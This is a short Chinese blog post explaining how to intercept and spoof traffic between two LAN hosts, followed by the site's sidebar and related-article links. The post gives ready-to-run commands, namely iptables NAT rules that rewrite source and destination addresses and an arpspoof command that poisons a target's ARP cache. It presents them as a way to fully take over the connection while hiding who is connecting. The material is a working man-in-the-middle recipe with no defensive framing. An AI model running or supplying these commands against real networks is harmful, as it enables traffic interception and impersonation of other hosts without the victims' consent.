文档章节

iptables nat地址欺骗

linhos
 linhos
发布于 2017/06/29 16:03
字数 229
阅读 55
收藏 0

目标主机:192.168.1.2 企图打开目的主机:192.168.1.3 的网页。此时,通过arp 欺骗和路由转发获取双方之间的连接。

  • 首先启动iptables NAT 功能 
sudo modprobe ip_tables
sudo modprobe ip_nat_ftp

通过iptables 的 NAT地址欺骗,使得目的主机不知道谁链接的他。

  • 添加一条NAT 指令:
sudo iptables -t nat -A POSTROUTING -s 192.168.1.2 -p tcp --dport 8080 -j SNAT --to 192.168.1.4

更改源地址为:192.168.1.2 ,目的端口为8080 的数据包的源地址为:192.168.1.4

sudo iptables -t nat -A PREROUTING -d 192.168.1.4 -p tcp --sport 8080 -j DNAT --to 192.168.1.2

将目的地址为192.168.1.4 ,源端口为8080 的tcp 数据包 的目的地址更改为192.168.1.2

  • 同时
sudo arpspoof -t 192.168.1.3 192.168.1.4 -i eno1

告诉 192.168.1.3 我就是192.168.1.2

  • 也可以直接 
sudo iptables -t nat -A POSTROUTING -s 192.168.1.2 -j SNAT --to 192.168.1.4
sudo iptables -t nat -A PREROUTING -d 192.168.1.4 -j DNAT --to 192.168.1.2

这样,能够全面接管他们之间的连接。

© 著作权归作者所有

上一篇: iptables 清空规则
下一篇: java 线程池
linhos
粉丝 1
博文 20
码字总数 3102
作品 0
苏州
私信 提问
Kali Linux Web渗透测试视频教程—第十四课-arp欺骗、嗅探\dns欺骗、session

目录Kali Linux Web 渗透测试—第十四课-arp欺骗、嗅探、dns欺骗、session劫持 1 关于嗅探、arp欺骗、会话劫持.............................................................. 1 视频教程地...

让往事随风
2016/06/16
163
0
Kali Linux Web 渗透测试视频教程—第十四课-arp欺骗、嗅探、dns欺骗、session劫持

Kali Linux Web 渗透测试视频教程—第十四课-arp欺骗、嗅探、dns欺骗、session劫持 文/玄魂 目录 Kali Linux Web 渗透测试—第十四课-arp欺骗、嗅探、dns欺骗、session劫持 1 关于嗅探、arp...

zting科技
2017/01/11
0
0
教你使用Linux防火墙隔离本地欺骗地址!

导读 几乎所有的 Linux 发行版都带着一个内建的防火墙来保护运行在 Linux 主机上的进程和应用程序。大多数防火墙都按照 IDS/IPS 解决方案设计,这样的设计的主要目的是检测和避免恶意包获取网...

问题终结者
2018/05/10
34
0
HTTPS及HTTPS中间人攻击

全站HTTPS正在称为潮流趋势,国内实现全站https的有淘宝和百度两家 0x01:https的作用 C I A:机密性,完整性,可用性(可用性是合法用户可以访问自己有权限访问的资源) 解决的是信息传输中...

wt7315
2016/11/26
0
0
Linux防火墙示例 用简单规则集保护网络

防火墙的配置要求如下: 1、 拒绝所有外面传入的、向外的和转发的包。 2、 允许所有外传的TCP连接:我们这里允许的如web/telnet/ssh/ftp等外传。 3、 允许外发的TCP连接的返回封包通过防火墙...

JavaGG
2009/05/23
150
0

没有更多内容

加载失败,请刷新页面

加载更多

学习记录(day05-标签操作、属性绑定、语句控制、数据绑定、事件绑定、案例用户登录)

[TOC] 1.1.1标签操作v-text&v-html v-text:会把data中绑定的数据值原样输出。 v-html:会把data中值输出,且会自动解析html代码 <!--可以将指定的内容显示到标签体中--><标签 v-text=""></......

庭前云落
41分钟前
5
0
VMware vSphere的两种RDM磁盘

在VMware vSphere vCenter中创建虚拟机时,可以添加一种叫RDM的磁盘。 RDM - Raw Device Mapping,原始设备映射,那么,RDM磁盘是不是就可以称作为“原始设备映射磁盘”呢?这也是一种可以热...

大别阿郎
今天
9
0
【AngularJS学习笔记】02 小杂烩及学习总结

本文转载于:专业的前端网站☞【AngularJS学习笔记】02 小杂烩及学习总结 表格示例 <div ng-app="myApp" ng-controller="customersCtrl"> <table> <tr ng-repeat="x in names | orderBy ......

前端老手
昨天
13
0
Linux 内核的五大创新

在科技行业,创新这个词几乎和革命一样到处泛滥,所以很难将那些夸张的东西与真正令人振奋的东西区分开来。Linux内核被称为创新,但它又被称为现代计算中最大的奇迹,一个微观世界中的庞然大...

阮鹏
昨天
16
0
【Medium 万赞好文】ViewModel 和 LIveData:模式 + 反模式

原文作者: Jose Alcérreca 原文地址: ViewModels and LiveData: Patterns + AntiPatterns 译者:秉心说 View 和 ViewModel 分配责任 理想情况下,ViewModel 应该对 Android 世界一无所知。...

秉心说
昨天
17
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部